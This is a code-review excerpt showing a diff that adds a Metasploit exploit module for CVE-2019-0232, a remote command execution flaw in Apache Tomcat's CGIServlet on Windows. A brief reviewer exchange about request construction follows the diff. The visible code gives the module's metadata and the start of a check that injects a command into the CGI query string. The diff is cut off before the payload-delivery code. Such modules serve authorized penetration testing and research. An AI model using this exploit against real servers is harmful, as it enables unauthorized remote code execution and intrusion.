modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb

```diff
@@ -0,0 +1,122 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'            => 'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability',
+      'Description'     => %q{
+        This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the
+        enableCmdLineArguments setting is set to true, a remote user can abuse this to execute
+        system commands, and gain remote code execution.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Yakov Shafranovich', # Original discovery
+          'sinn3r'              # Metasploit module
+        ],
+      'Platform'        => 'win',
+      'Arch'            => [ARCH_X86, ARCH_X64],
+      'Targets'         =>
+        [
+          [ 'Apache Tomcat 9.0 or prior for Windows', { } ]
+        ],
+      'References'      =>
+        [
+          ['CVE', '2019-0232'],
+          ['URL', 'https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/'],
+          ['URL', 'https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/']
+        ],
+      'Notes'           =>
+        {
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'CmdStagerFlavor' => 'vbs',
+      'DefaultOptions'  =>
+        {
+          'RPORT' => 8080
+        },
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Apr 10 2019', # Date of public advisory issued by the vendor
+      'DefaultTarget'   => 0
+      ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path to CGI script', '/'])
+      ])
+
+    deregister_options('SRVHOST', 'SRVPORT', 'URIPATH')
+  end
+
+  def check
+    sig = Rex::Text.rand_text_alpha(10)
+    uri = normalize_uri(target_uri.path)
+    uri << "?&echo+#{sig}"
```

Comment:
Use `vars_get` in the request.

Reply:
`vars_get` doesn't craft the type of malformed request I need, so I can't use it.